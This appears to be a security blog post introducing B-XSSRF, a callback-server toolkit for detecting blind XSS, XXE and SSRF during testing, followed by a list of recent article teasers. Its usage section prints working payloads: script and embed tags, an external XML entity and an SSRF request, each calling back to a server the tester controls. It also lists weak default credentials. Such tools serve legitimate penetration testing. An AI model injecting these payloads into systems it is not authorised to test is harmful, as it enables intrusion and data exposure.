B-XSSRF : Toolkit To Detect & Keep Track On Blind XSS, XXE & SSRF

B-XSSRF is a toolkit to detect and keep track on Blind XSS, XXE & SSRF.

Read More – RedHunt OS : Virtual Machine for Adversary Emulation & Threat Hunting

SETUP

  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src=”http://mysite.com/bxssrf/request.php”>
<script src=”http://mysite.com/bxssrf/request.php”>

BLIND XXE

<?xml version=”1.0″ ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM “http://mysite.com/bxssrf/request.php”> %ext;
]>
<r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : admin@test.com
PASS : 123456

Download
R K

Share
Published by
R K
Tags: B-XSSRFBlind XSSBlind XXESSRF
7 years ago

Recent Posts

How UDP Works and Why It Is So Fast

When people ask how UDP works, the simplest answer is this: UDP sends data quickly…

1 day ago

How EDR Killers Bypass Security Tools

Endpoint Detection and Response (EDR) solutions have become a cornerstone of modern cybersecurity, designed to…

5 days ago

AI-Generated Malware Campaign Scales Threats Through Vibe Coding Techniques

A large-scale malware campaign leveraging AI-assisted development techniques has been uncovered, revealing how attackers are…

5 days ago

How Does a Firewall Work Step by Step

How Does a Firewall Work Step by Step? What Is a Firewall and How Does…

5 days ago

Fake VPN Download Trap Can Steal Your Work Login in Minutes

People trying to securely connect to work are being tricked into doing the exact opposite.…

6 days ago

This Android Bug Can Crack Your Lock Screen in 60 Seconds

A newly disclosed Android vulnerability is making noise for a good reason. Researchers showed that…

1 week ago